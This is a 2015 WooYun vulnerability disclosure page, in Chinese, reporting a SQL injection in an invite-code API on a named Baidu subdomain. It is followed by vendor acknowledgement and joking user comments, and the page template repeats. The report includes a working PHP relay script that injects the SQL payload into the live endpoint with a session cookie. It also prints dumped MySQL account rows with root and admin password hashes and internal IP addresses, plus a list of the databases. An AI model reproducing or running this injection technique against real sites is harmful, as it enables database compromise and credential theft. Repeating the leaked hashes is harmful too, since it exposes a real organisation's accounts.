百度某二级域名root权限注入 | wooyun-2015-0105423| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105423

漏洞标题：百度某二级域名root权限注入

漏洞作者：杀器王子

提交时间：2015-04-02 16:49

修复时间：2015-05-18 15:14

公开时间：2015-05-18 15:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-02：细节已通知厂商并且等待厂商处理中
2015-04-03：厂商已经确认，细节仅向厂商公开
2015-04-13：细节向核心白帽子及相关领域专家公开
2015-04-23：细节向普通白帽子公开
2015-05-03：细节向实习白帽子公开
2015-05-18：细节向公众公开

简要描述：

百度某二级域名root权限注入

详细说明：

https://jpaas-edu.baidu.com/
这个站
填写邀请码的地方存在注入
虽然有验证码但是一个session内不刷新验证码不过期
中转脚本：

<?php
$querystring = "https://jpaas-edu.baidu.com/xplatfe/invite/api_use_invite_code?invite_code=123' or 1=(1=".$_GET['sql'].") limit 1--+&verify=7kpc";  
$cookie_jar='Cookie: sessionid=xxxxxxx'; 
$querystring=str_replace(' ', '%20', $querystring);
//print $querystring;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $querystring);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie_jar);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result=curl_exec($ch);
curl_close($ch);
print $result;
?>

漏洞证明：

Database: mysql
Table: user
[6 entries]
+--------------+--------+-------------------------------------------+
| Host         | User   | Password                                  |
+--------------+--------+-------------------------------------------+
| 10.50.139.13 | root   | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| 10.50.141.55 | edu_rd | *5A0E47C6BA3A218EC7B929CEB437E60772DD89E1 |
| 127.0.0.1    | admin  | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| 127.0.0.1    | root   | *62F991AB07B10BD7A6C95A83E991CB912A136690 |
| localhost    | admin  | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| localhost    | root   | *62F991AB07B10BD7A6C95A83E991CB912A136690 |
+--------------+--------+-------------------------------------------+

available databases [6]:
[*] baidu_dba
[*] edu
[*] edu2
[*] information_schema
[*] mysql
[*] test

修复方案：

修复注入

版权声明：转载请注明来源杀器王子@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-04-03 15:12

厂商回复：

感谢提交，已通知业务部门处理

漏洞评价：

2015-04-02 16:54 | 子墨 ( 普通白帽子 | Rank:194 漏洞数:22 | 天地不仁,以万物为刍狗;圣人不仁,以百姓为...)

沙发
2015-04-02 17:09 | boooooom ( 普通白帽子 | Rank:467 漏洞数:50 | 我有一个好想法！)

杀器厉害！
2015-04-02 17:13 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

为什么我跪着看乌云~
2015-04-02 17:33 | 盛大网络(乌云厂商)

百度给分太少啦
2015-04-02 18:13 | 优酷(乌云厂商)

@盛大网络说的也是
2015-04-02 18:36 | 浩天 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

@盛大网络 @优酷又来卖萌
2015-04-02 18:56 | 子非海绵宝宝 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

@浩天 @优酷 @盛大网络 2个土豪厂商又来嘲讽了....
2015-04-04 22:09 | 老虎 ( 路人 | Rank:0 漏洞数:2 | 低调)

@优酷 @浩天 @盛大网络三个来卖萌了又
2015-04-08 19:32 | Toom ( 路人 | Rank:6 漏洞数:3 | 啊)

网管问我为什么跪着看电脑

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105423

漏洞标题：百度某二级域名root权限注入

相关厂商：百度

漏洞作者：杀器王子

提交时间：2015-04-02 16:49

修复时间：2015-05-18 15:14

公开时间：2015-05-18 15:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源杀器王子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105423

漏洞标题：百度某二级域名root权限注入

相关厂商：百度

漏洞作者： 杀器王子

提交时间：2015-04-02 16:49

修复时间：2015-05-18 15:14

公开时间：2015-05-18 15:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0105423"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 杀器王子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：杀器王子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源杀器王子@乌云